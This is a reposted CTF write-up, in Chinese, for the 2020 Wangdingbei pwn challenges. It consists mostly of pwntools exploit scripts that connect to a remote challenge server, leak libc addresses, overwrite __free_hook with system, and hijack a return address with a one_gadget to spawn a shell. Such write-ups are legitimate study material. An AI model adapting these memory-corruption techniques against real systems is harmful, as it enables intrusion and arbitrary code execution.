2020网鼎杯pwn

来源：99网

from pwn import *
#sh = process('./pwn')
sh = remote('182.92.73.10', 24573)
#gdb.attach(sh)
#context.log_level = 'debug'
sleep(1)
code = '''
int main()
{
    int a;
    int * b;
    int * c;
    int * e;
    int * put_got;
    int * libc_base;
    int * base;
    b = &a +3;
    c = *b;
    c = c + 18;
    #这个地方各个系统栈存储基地址的位置不太一样，所以是慢慢加1测出远端的程序基地址位置的
    base = *c - 0x040;
    e = base + 0x40c02;#指向函数使用次数，从而任意调用函数
    put_got = base + 0x40bef;
    printf("%p\n", *put_got);
    *e = 1;
    c = c + 6;
    printf("%p\n", *c);
    libc_base = *put_got - 0x06f690;
    printf("%p\n", libc_base);
}
'''
sh.sendline(code)
sh.interactive()

from pwn import *
#sh = process('./pwn')
sh = remote('182.92.73.10',362)
#gdb.attach(sh)
context.log_level = 'debug'
sleep(1)
code = '''
int main()
{
    int a;
    int * b;
    int * c;
    int * system;
    int * free_hook;
    b = &a +3;
    c = *b;
    c = c + 24;
    system = 0x45390 + *c - 0x3ca000;
    free_hook = *c + 0x3c67a8 - 0x3ca000;
    *free_hook = system;
    #printf("%p", *free_hook);
    free("/bin/sh");
}
'''
sh.sendline(code)
sh.interactive()

拿下flag,其实本来想用open,read,write函数做的，但是不知道只有运行shell输入token才能拿flag,浪费了不少时间

from pwn import *
#sh = process('./pwn')
sh = remote('182.92.73.10',362)
#gdb.attach(sh)

mov_r1_r2_index = '\x00' * 8 
payload = mov_r1_r2_index + '\xfc' + '\xff' + '\xff' * 6
#通过&r2 - 3复制给r1指向栈的地址 
payload += '\x09' + '\x00' * 7
#取值字节码，大概就是r1 = *r1，这样就获得栈地址了
payload += '\x0d' + '\x00' * 7
#r1 的入栈操作
payload += '\x01' + '\x00' * 7
payload += '\x18' + '\xff' + '\xff' * 6
#对r1赋值，这里赋值的是上一个r1指向栈地址和main函数放回地址的偏移
payload += '\x19' + '\x00' * 7
#将栈指向值加上r1后赋值给r1,此时r1的值就是指向main_ret的栈地址，同时出栈
payload += '\x0d' + '\x00' * 7
#r1入栈
payload += '\x09' + '\x00' * 7
#r1取值，此时r1就是main函数放回地址，这个地址在libc中，所以加上onegadget偏移后再覆盖回去就能劫持程序
payload += '\x0d' + '\x00' * 7
#r1入栈
payload += '\x01' + '\x00' * 7
payload += '\x17' + '\x09' + '\x0d' + '\x00' * 5
#r1赋值为onegadget偏移
payload += '\x19' + '\x00' * 7
#加偏移出栈，此时r1就是onegadget
payload += '\x0B' + '\x00' * 7
#将r1赋值栈中地址指向的值，大概就是*[rsp] = r1的意思
sh.send(payload)
sh.interactive()

因篇幅问题不能全部显示，请点此查看更多更全内容

查看全文

全部频道

2020网鼎杯pwn